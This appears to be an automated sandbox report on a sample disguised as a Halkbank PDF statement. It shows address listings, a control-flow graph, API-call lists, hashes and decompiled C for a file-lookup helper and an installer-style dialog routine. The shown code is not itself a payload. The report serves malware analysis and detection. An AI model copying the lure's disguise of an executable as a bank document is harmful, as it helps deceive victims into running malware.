                                                      0x00000000
                                                      0x00000000
                                                      0x00407286
                                                      0x00407286
                                                      0x0040728a
                                                      0x004075b1
                                                      0x00000000
                                                      0x004075b1
                                                      0x00407290
                                                      0x00407293
                                                      0x00407296
                                                      0x0040729a
                                                      0x0040729d
                                                      0x004072a3
                                                      0x004072a5
                                                      0x004072a5
                                                      0x004072a5
                                                      0x004072a8
                                                      0x00000000
                                                      0x00000000
                                                      0x00407056
                                                      0x00407056
                                                      0x00407059
                                                      0x00000000
                                                      0x00000000
                                                      0x00407395
                                                      0x00407399
                                                      0x004073bb
                                                      0x004073be
                                                      0x004073c8
                                                      0x00000000
                                                      0x004073c8
                                                      0x0040739b
                                                      0x0040739e
                                                      0x004073a2
                                                      0x004073a5
                                                      0x004073a5
                                                      0x004073a8
                                                      0x00000000
                                                      0x00000000
                                                      0x00407452
                                                      0x00407456
                                                      0x00407474
                                                      0x00407474
                                                      0x00407474
                                                      0x0040747b
                                                      0x00407482
                                                      0x00407489
                                                      0x00407489
                                                      0x00000000
                                                      0x00407489
                                                      0x00407458
                                                      0x0040745b
                                                      0x0040745e
                                                      0x00407461
                                                      0x00407468
                                                      0x004073ac
                                                      0x004073ac
                                                      0x004073af
                                                      0x00000000
                                                      0x00000000
                                                      0x00407543
                                                      0x00407546
                                                      0x00000000
                                                      0x00000000
                                                      0x0040717d
                                                      0x0040717f
                                                      0x00407186
                                                      0x00407187
                                                      0x00407189
                                                      0x0040718c
                                                      0x00000000
                                                      0x00000000
                                                      0x00407194
                                                      0x00407197
                                                      0x0040719a
                                                      0x0040719c
                                                      0x0040719e
                                                      0x0040719e
                                                      0x0040719f
                                                      0x004071a2
                                                      0x004071a9
                                                      0x004071ac
                                                      0x004071ba
                                                      0x00000000
                                                      0x00000000
                                                      0x00407490
                                                      0x00407490
                                                      0x00407493
                                                      0x0040749a
                                                      0x00000000
                                                      0x00000000
                                                      0x0040749f
                                                      0x0040749f
                                                      0x004074a3
                                                      0x004075db
                                                      0x00000000
                                                      0x004075db
                                                      0x004074a9
                                                      0x004074ac
                                                      0x004074af
                                                      0x004074b3
                                                      0x004074b6
                                                      0x004074bc
                                                      0x004074be
                                                      0x004074be
                                                      0x004074be
                                                      0x004074c1
                                                      0x004074c4
                                                      0x004074c4
                                                      0x004074c4
                                                      0x004074c4
                                                      0x004074c7
                                                      0x004074c7
                                                      0x004074cb
                                                      0x0040752b
                                                      0x0040752e
                                                      0x00407533
                                                      0x00407534
                                                      0x00407536
                                                      0x00407538
                                                      0x0040753b
                                                      0x00000000
                                                      0x0040753b
                                                      0x004074cd
                                                      0x004074d3
                                                      0x004074d6
                                                      0x004074d9
                                                      0x004074dc
                                                      0x004074df
                                                      0x004074e2
                                                      0x004074e5
                                                      0x004074e8
                                                      0x004074eb
                                                      0x004074ee
                                                      0x00407507
                                                      0x0040750a
                                                      0x0040750d
                                                      0x00407510
                                                      0x00407514
                                                      0x00407516
                                                      0x00407516
                                                      0x00407517
                                                      0x0040751a
                                                      0x004074f0
                                                      0x004074f0
                                                      0x004074f8
                                                      0x004074fd
                                                      0x004074ff
                                                      0x00407502
                                                      0x00407502
                                                      0x0040751d
                                                      0x00407524
                                                      0x00000000
                                                      0x00407526
                                                      0x00000000
                                                      0x00407526
                                                      0x00000000
                                                      0x004071c2
                                                      0x004071c5
                                                      0x004071fb
                                                      0x0040732b
                                                      0x0040732b
                                                      0x0040732b
                                                      0x0040732b
                                                      0x0040732e
                                                      0x0040732e
                                                      0x00407331
                                                      0x00407333
                                                      0x004075bd
                                                      0x00000000
                                                      0x004075bd
                                                      0x00407339
                                                      0x0040733c
                                                      0x00000000
                                                      0x00000000
                                                      0x00407342
                                                      0x00407346
                                                      0x00407349
                                                      0x00407349
                                                      0x00407349
                                                      0x00000000
                                                      0x00407349
                                                      0x004071c7
                                                      0x004071c9
                                                      0x004071cb
                                                      0x004071cd
                                                      0x004071d0
                                                      0x004071d1
                                                      0x004071d3
                                                      0x004071d5
                                                      0x004071d8
                                                      0x004071db
                                                      0x004071f1
                                                      0x004071f6
                                                      0x0040722e
                                                      0x0040722e
                                                      0x00407232
                                                      0x0040725e
                                                      0x00407260
                                                      0x00407267
                                                      0x0040726a
                                                      0x0040726d
                                                      0x0040726d
                                                      0x00407272
                                                      0x00407272
                                                      0x00407274
                                                      0x00407277
                                                      0x0040727e
                                                      0x00407281
                                                      0x004072ae
                                                      0x004072ae
                                                      0x004072b1
                                                      0x004072b4
                                                      0x00407328
                                                      0x00407328
                                                      0x00407328
                                                      0x00000000
                                                      0x00407328
                                                      0x004072b6
                                                      0x004072bc
                                                      0x004072bf
                                                      0x004072c2
                                                      0x004072c5
                                                      0x004072c8
                                                      0x004072cb
                                                      0x004072ce
                                                      0x004072d1
                                                      0x004072d4
                                                      0x004072d7
                                                      0x004072f0
                                                      0x004072f2
                                                      0x004072f5
                                                      0x004072f6
                                                      0x004072f9
                                                      0x004072fb
                                                      0x004072fe
                                                      0x00407300
                                                      0x00407302
                                                      0x00407305
                                                      0x00407307
                                                      0x0040730a
                                                      0x0040730e
                                                      0x00407310
                                                      0x00407310
                                                      0x00407311
                                                      0x00407314
                                                      0x00407317
                                                      0x004072d9
                                                      0x004072d9
                                                      0x004072e1
                                                      0x004072e6
                                                      0x004072e8
                                                      0x004072eb
                                                      0x004072eb
                                                      0x0040731a
                                                      0x00407321
                                                      0x004072ab
                                                      0x004072ab
                                                      0x004072ab
                                                      0x004072ab
                                                      0x00000000
                                                      0x00407323
                                                      0x00000000
                                                      0x00407323
                                                      0x00407321
                                                      0x00407234
                                                      0x00407237
                                                      0x00407239
                                                      0x0040723c
                                                      0x0040723f
                                                      0x00407242
                                                      0x00407244
                                                      0x00407247
                                                      0x0040724a
                                                      0x0040724a
                                                      0x0040724d
                                                      0x0040724d
                                                      0x00407250
                                                      0x00407257
                                                      0x0040722b
                                                      0x0040722b
                                                      0x0040722b
                                                      0x0040722b
                                                      0x00000000
                                                      0x00407259
                                                      0x00000000
                                                      0x00407259
                                                      0x00407257
                                                      0x004071dd
                                                      0x004071e0
                                                      0x004071e2
                                                      0x004071e5
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004070cf
                                                      0x004070cf
                                                      0x004070d3
                                                      0x00407599
                                                      0x00000000
                                                      0x00407599
                                                      0x004070d9
                                                      0x004070dc
                                                      0x004070df
                                                      0x004070e2
                                                      0x004070e4
                                                      0x004070e4
                                                      0x004070e4
                                                      0x004070e7
                                                      0x004070ea
                                                      0x004070ed
                                                      0x004070f0
                                                      0x004070f3
                                                      0x004070f6
                                                      0x004070f7
                                                      0x004070f9
                                                      0x004070f9
                                                      0x004070f9
                                                      0x004070fc
                                                      0x004070ff
                                                      0x00407102
                                                      0x00407105
                                                      0x00407105
                                                      0x00407105
                                                      0x00407108
                                                      0x00000000
                                                      0x00000000
                                                      0x0040734c
                                                      0x0040734c
                                                      0x0040734c
                                                      0x00407350
                                                      0x00000000
                                                      0x00000000
                                                      0x00407356
                                                      0x00407359
                                                      0x0040735c
                                                      0x0040735f
                                                      0x00407361
                                                      0x00407361
                                                      0x00407361
                                                      0x00407364
                                                      0x00407367
                                                      0x0040736a
                                                      0x0040736d
                                                      0x00407370
                                                      0x00407373
                                                      0x00407374
                                                      0x00407376
                                                      0x00407376
                                                      0x00407376
                                                      0x00407379
                                                      0x0040737c
                                                      0x0040737f
                                                      0x00407382
                                                      0x00407385
                                                      0x00407389
                                                      0x0040738b
                                                      0x0040738e
                                                      0x00000000
                                                      0x00407390
                                                      0x00000000
                                                      0x00407390
                                                      0x0040738e
                                                      0x004075c3
                                                      0x00000000
                                                      0x00000000
                                                      0x00406bf2

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                      • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                                                      • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                      • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040699E Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0040699E(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426798); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x426798;
			}




                                                      0x004069a9
                                                      0x004069b2
                                                      0x00000000
                                                      0x004069bf
                                                      0x004069b5
                                                      0x00000000

                                                      APIs
                                                      • FindFirstFileW.KERNELBASE(7476FAA0,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,7476FAA0,?,7476F560,00405D94,?,7476FAA0,7476F560), ref: 004069A9
                                                      • FindClose.KERNEL32(00000000), ref: 004069B5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: Find$CloseFileFirst
                                                      • String ID:
                                                      • API String ID: 2295610775-0
                                                      • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                      • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                                                      • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                      • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004040C5 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357windowstringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 141 4040c5-4040d7 142 4040dd-4040e3 141->142 143 40423e-40424d 141->143 142->143 144 4040e9-4040f2 142->144 145 40429c-4042b1 143->145 146 40424f-40428a GetDlgItem * 2 call 4045c4 KiUserCallbackDispatcher call 40140b 143->146 149 4040f4-404101 SetWindowPos 144->149 150 404107-40410e 144->150 147 4042f1-4042f6 call 404610 145->147 148 4042b3-4042b6 145->148 167 40428f-404297 146->167 163 4042fb-404316 147->163 152 4042b8-4042c3 call 401389 148->152 153 4042e9-4042eb 148->153 149->150 155 404110-40412a ShowWindow 150->155 156 404152-404158 150->156 152->153 177 4042c5-4042e4 SendMessageW 152->177 153->147 162 404591 153->162 164 404130-404143 GetWindowLongW 155->164 165 40422b-404239 call 40462b 155->165 158 404171-404174 156->158 159 40415a-40416c DestroyWindow 156->159 169 404176-404182 SetWindowLongW 158->169 170 404187-40418d 158->170 166 40456e-404574 159->166 168 404593-40459a 162->168 173 404318-40431a call 40140b 163->173 174 40431f-404325 163->174 164->165 175 404149-40414c ShowWindow 164->175 165->168 166->162 180 404576-40457c 166->180 167->145 169->168 170->165 176 404193-4041a2 GetDlgItem 170->176 173->174 181 40432b-404336 174->181 182 40454f-404568 DestroyWindow EndDialog 174->182 175->156 184 4041c1-4041c4 176->184 185 4041a4-4041bb SendMessageW IsWindowEnabled 176->185 177->168 180->162 186 40457e-404587 ShowWindow 180->186 181->182 183 40433c-404389 call 4066a5 call 4045c4 * 3 GetDlgItem 181->183 182->166 213 404393-4043cf ShowWindow EnableWindow call 4045e6 EnableWindow 183->213 214 40438b-404390 183->214 188 4041c6-4041c7 184->188 189 4041c9-4041cc 184->189 185->162 185->184 186->162 191 4041f7-4041fc call 40459d 188->191 192 4041da-4041df 189->192 193 4041ce-4041d4 189->193 191->165 196 404215-404225 SendMessageW 192->196 198 4041e1-4041e7 192->198 193->196 197 4041d6-4041d8 193->197 196->165 197->191 201 4041e9-4041ef call 40140b 198->201 202 4041fe-404207 call 40140b 198->202 209 4041f5 201->209 202->165 211 404209-404213 202->211 209->191 211->209 217 4043d1-4043d2 213->217 218 4043d4 213->218 214->213 219 4043d6-404404 GetSystemMenu EnableMenuItem SendMessageW 217->219 218->219 220 404406-404417 SendMessageW 219->220 221 404419 219->221 222 40441f-40445e call 4045f9 call 4040a6 call 406668 lstrlenW call 4066a5 SetWindowTextW call 401389 220->222 221->222 222->163 233 404464-404466 222->233 233->163 234 40446c-404470 233->234 235 404472-404478 234->235 236 40448f-4044a3 DestroyWindow 234->236 235->162 237 40447e-404484 235->237 236->166 238 4044a9-4044d6 CreateDialogParamW 236->238 237->163 239 40448a 237->239 238->166 240 4044dc-404533 call 4045c4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 238->240 239->162 240->162 245 404535-40454d ShowWindow call 404610 240->245 245->166
                                                      C-Code - Quality: 84%
                                                      			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;
				void* _t145;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x423730 = _t34;
					if(_t130 == 0x110) {
						 *0x42a268 = _t127;
						 *0x423744 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x421710 = _t91;
						E004045C4(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x429248); // executed
						 *0x42922c = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x423730 = 1;
					}
					_t124 =  *0x40a39c; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x42a280;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E00404610(0x40b);
						while(1) {
							_t36 =  *0x423730;
							 *0x40a39c =  *0x40a39c + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a39c; // 0x0
							__eflags = _t38 -  *0x42a284;
							if(_t38 ==  *0x42a284) {
								E0040140B(1);
							}
							__eflags =  *0x42922c - _t136;
							if( *0x42922c != _t136) {
								break;
							}
							__eflags =  *0x40a39c -  *0x42a284; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004045C4(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x42a2ec - _t136;
							_v28 = _t48;
							if( *0x42a2ec != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008);
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
							E004045E6(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x421710, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x42a2ec - _t136;
							if( *0x42a2ec == _t136) {
								_push( *0x423744);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x421710);
							}
							E004045F9();
							E00406668(0x423748, E004040A6());
							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x423748);
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x429238);
									 *0x422720 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
									__eflags = _t73 - _t136;
									 *0x429238 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004045C4(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x42922c - _t136;
									if( *0x42922c != _t136) {
										goto L63;
									}
									ShowWindow( *0x429238, 8);
									E00404610(0x405);
									goto L60;
								}
								__eflags =  *0x42a2ec - _t136;
								if( *0x42a2ec != _t136) {
									goto L63;
								}
								__eflags =  *0x42a2e0 - _t136;
								if( *0x42a2e0 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x429238); // executed
						 *0x42a268 = _t136;
						EndDialog(_t127,  *0x421f18);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x429238, 0x40f, 0, 1);
						__eflags =  *0x42922c;
						return 0 |  *0x42922c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x429238, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x42a2ec - _t136;
											if( *0x42a2ec == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x421f18 = 1;
												L23:
												_push(0x78);
												L24:
												E0040459D();
												goto L28;
											}
											E0040140B(_t129);
											 *0x421f18 = _t129;
											goto L23;
										}
										__eflags =  *0x40a39c - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x429238);
						 *0x429238 = _t122;
						L60:
						_t145 =  *0x425748 - _t136; // 0x0
						if(_t145 == 0 &&  *0x429238 != _t136) {
							ShowWindow(_t127, 0xa);
							 *0x425748 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E0040462B(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}
































                                                      0x004040d0
                                                      0x004040d7
                                                      0x0040423e
                                                      0x00404242
                                                      0x00404246
                                                      0x00404248
                                                      0x0040424d
                                                      0x00404258
                                                      0x00404263
                                                      0x00404268
                                                      0x0040426a
                                                      0x0040426c
                                                      0x0040426f
                                                      0x00404274
                                                      0x00404282
                                                      0x0040428f
                                                      0x00404296
                                                      0x00404296
                                                      0x00404297
                                                      0x00404297
                                                      0x0040429c
                                                      0x004042a2
                                                      0x004042a9
                                                      0x004042af
                                                      0x004042b1
                                                      0x004042f1
                                                      0x004042f6
                                                      0x004042fb
                                                      0x004042fb
                                                      0x00404300
                                                      0x00404309
                                                      0x0040430b
                                                      0x00404310
                                                      0x00404316
                                                      0x0040431a
                                                      0x0040431a
                                                      0x0040431f
                                                      0x00404325
                                                      0x00000000
                                                      0x00000000
                                                      0x00404330
                                                      0x00404336
                                                      0x00000000
                                                      0x00000000
                                                      0x0040433f
                                                      0x00404347
                                                      0x0040434c
                                                      0x0040434f
                                                      0x00404355
                                                      0x0040435a
                                                      0x0040435d
                                                      0x00404363
                                                      0x00404368
                                                      0x0040436b
                                                      0x00404371
                                                      0x00404379
                                                      0x0040437f
                                                      0x00404385
                                                      0x00404389
                                                      0x00404390
                                                      0x00404390
                                                      0x00404390
                                                      0x0040439a
                                                      0x004043ac
                                                      0x004043b8
                                                      0x004043bd
                                                      0x004043c7
                                                      0x004043cd
                                                      0x004043cf
                                                      0x004043d4
                                                      0x004043d1
                                                      0x004043d1
                                                      0x004043d1
                                                      0x004043e4
                                                      0x004043fc
                                                      0x004043fe
                                                      0x00404404
                                                      0x00404419
                                                      0x00404406
                                                      0x0040440f
                                                      0x00404411
                                                      0x00404411
                                                      0x0040441f
                                                      0x00404430
                                                      0x00404446
                                                      0x0040444d
                                                      0x00404453
                                                      0x00404457
                                                      0x0040445c
                                                      0x0040445e
                                                      0x00000000
                                                      0x00404464
                                                      0x00404464
                                                      0x00404466
                                                      0x00000000
                                                      0x00000000
                                                      0x0040446c
                                                      0x00404470
                                                      0x00404495
                                                      0x0040449b
                                                      0x004044a1
                                                      0x004044a3
                                                      0x00000000
                                                      0x00000000
                                                      0x004044c9
                                                      0x004044cf
                                                      0x004044d1
                                                      0x004044d6
                                                      0x00000000
                                                      0x00000000
                                                      0x004044dc
                                                      0x004044df
                                                      0x004044e2
                                                      0x004044f9
                                                      0x00404505
                                                      0x0040451e
                                                      0x00404524
                                                      0x00404528
                                                      0x0040452d
                                                      0x00404533
                                                      0x00000000
                                                      0x00000000
                                                      0x0040453d
                                                      0x00404548
                                                      0x00000000
                                                      0x00404548
                                                      0x00404472
                                                      0x00404478
                                                      0x00000000
                                                      0x00000000
                                                      0x0040447e
                                                      0x00404484
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040448a
                                                      0x0040445e
                                                      0x00404555
                                                      0x00404561
                                                      0x00404568
                                                      0x00000000
                                                      0x004042b3
                                                      0x004042b3
                                                      0x004042b6
                                                      0x004042e9
                                                      0x004042e9
                                                      0x004042eb
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004042eb
                                                      0x004042b8
                                                      0x004042bc
                                                      0x004042c1
                                                      0x004042c3
                                                      0x00000000
                                                      0x00000000
                                                      0x004042d3
                                                      0x004042db
                                                      0x00000000
                                                      0x004042e1
                                                      0x004040e9
                                                      0x004040e9
                                                      0x004040ed
                                                      0x004040f2
                                                      0x00404101
                                                      0x00404101
                                                      0x00404107
                                                      0x0040410e
                                                      0x00404152
                                                      0x00404158
                                                      0x00404171
                                                      0x00404174
                                                      0x00404187
                                                      0x0040418d
                                                      0x00000000
                                                      0x00000000
                                                      0x00404193
                                                      0x0040419e
                                                      0x004041a0
                                                      0x004041a2
                                                      0x004041c1
                                                      0x004041c1
                                                      0x004041c4
                                                      0x004041c9
                                                      0x004041cc
                                                      0x004041dc
                                                      0x004041dd
                                                      0x004041df
                                                      0x00404215
                                                      0x00404225
                                                      0x00000000
                                                      0x00404225
                                                      0x004041e1
                                                      0x004041e7
                                                      0x00404200
                                                      0x00404205
                                                      0x00404207
                                                      0x00000000
                                                      0x00000000
                                                      0x00404209
                                                      0x004041f5
                                                      0x004041f5
                                                      0x004041f7
                                                      0x004041f7
                                                      0x00000000
                                                      0x004041f7
                                                      0x004041ea
                                                      0x004041ef
                                                      0x00000000
                                                      0x004041ef
                                                      0x004041ce
                                                      0x004041d4
                                                      0x00000000
                                                      0x00000000
                                                      0x004041d6
                                                      0x00000000
                                                      0x004041d6
                                                      0x004041c6
                                                      0x00000000
                                                      0x004041c6
                                                      0x004041ac
                                                      0x004041b3
                                                      0x004041b9
                                                      0x004041bb
                                                      0x00404591
                                                      0x00000000
                                                      0x00404591
                                                      0x00000000
                                                      0x004041bb
                                                      0x00404179
                                                      0x00000000
                                                      0x00404181
                                                      0x00404160
                                                      0x00404166
                                                      0x0040456e
                                                      0x0040456e
                                                      0x00404574
                                                      0x00404581
                                                      0x00404587
                                                      0x00404587
                                                      0x00000000
                                                      0x00404110
                                                      0x00404115
                                                      0x00404121
                                                      0x0040412a
                                                      0x0040422b
                                                      0x00000000
                                                      0x00404149
                                                      0x0040414c
                                                      0x00000000
                                                      0x0040414c
                                                      0x0040412a
                                                      0x0040410e

                                                      APIs
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                                                      • ShowWindow.USER32(?), ref: 00404121
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                                                      • ShowWindow.USER32(?,00000004), ref: 0040414C
                                                      • DestroyWindow.USER32 ref: 00404160
                                                      • SetWindowLongW.USER32 ref: 00404179
                                                      • GetDlgItem.USER32 ref: 00404198
                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                                                      • IsWindowEnabled.USER32(00000000), ref: 004041B3
                                                      • GetDlgItem.USER32 ref: 0040425E
                                                      • GetDlgItem.USER32 ref: 00404268
                                                      • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404282
                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                                                      • GetDlgItem.USER32 ref: 00404379
                                                      • ShowWindow.USER32(00000000,?), ref: 0040439A
                                                      • EnableWindow.USER32(?,?), ref: 004043AC
                                                      • EnableWindow.USER32(?,?), ref: 004043C7
                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
                                                      • EnableMenuItem.USER32 ref: 004043E4
                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                                                      • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                                                      • SetWindowTextW.USER32(?,00423748), ref: 0040444D
